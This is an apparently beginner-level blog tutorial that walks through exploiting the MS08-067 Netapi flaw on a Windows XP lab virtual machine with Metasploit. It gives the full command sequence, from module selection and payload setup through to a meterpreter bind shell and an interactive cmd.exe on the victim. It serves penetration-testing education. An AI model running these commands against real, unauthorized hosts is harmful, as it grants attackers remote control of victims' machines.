Ready to Start Your Career?
March 7, 2016
Windows XP Netapi Exploitation
March 7, 2016
In this article, I'll show you how easily you can exploit a system running Windows XP using the Netapi exploit.Before we start, you might be wondering why you'd exploit an old version of Windows. My answer is: you gotta take baby steps before you can run. Lab Setup:-> A Windows XP virtual machine with SP2/SP3 (I used SP2)->A Kali Virtual machine / standalone system I'll leave finding the host on the network and identifying the services being run up to you.Let's assume you've found the IP address of your victim, which is say 192.168.1.5 and your attacker machine's is at 192.168.1.6 In your terminal on Kali, open up Metasploit:
usr->share->metasploit-frameworkIn here, you'll find: msfconsole, run it (it takes a moment to open) Now we will search the Netapi exploit:
msf>search netapiYou'll be shown a number of results, among which you'll find:
exploit/windows/smb/ms08_067_netapiCopy this and paste as follows:
msf>use exploit/windows/smb/ms08_067_netapiNow, you'll get:
msf exploit(ms08_067_netapi)>The exploit is chosen and we need to set certain parameters for this exploit:
msf exploit(ms08_067_netapi)> show optionsSet up rhost and rport (if not set by default) and set RHOST (the remote host or the victim) as follows:
msf exploit(ms08_067_netapi)> set rhost 192.168.1.5
port number for the remote host is set 445 by defaultOur exploit is ready, but we need a payload for the exploitation. There are a number of payloads available, which can be searched as follows:
msf exploit(ms08_067_netapi)>search payloadI've tried bind shell and reverse shell. Here, we'll go with bind shell:
msf exploit(ms08_067_netapi)> set payload windows/meterpreter/bind_tcpJust like we set certain parameters for exploit before, we need to do the same here:
msf exploit(ms08_067_netapi)> show optionsSet lport and lhost, which are the port number and IP address of the local machine/attacker machine:
msf exploit(ms08_067_netapi)>set lhost 192.168.1.6We're all set:
msf exploit(ms08_067_netapi)> exploitIf you've ollowed the steps correctly, you will be presented with a meterpreter prompt. To get the windows cmd, type in the following command:
meterpreter> execute -f cmd.exe -c -HA channel will be created in the following output form:
' channel 1 created'
meterpreter> interact 1You'll ave the cmd of the victim!! While choosing the exploit, you can use: >show target to know which OS's are vulnerable to this exploit.The exploitation could have been done with:
windows/shell_bind_tcp but i went for the meterpreter command.Read about meterpreter to know why. Here are a few links that you may find useful:https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/http://resources.infosecinstitute.com/icmp-reverse-shell/https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi If you just started in exploitations, there may be a lot of doubts, so do connect with me.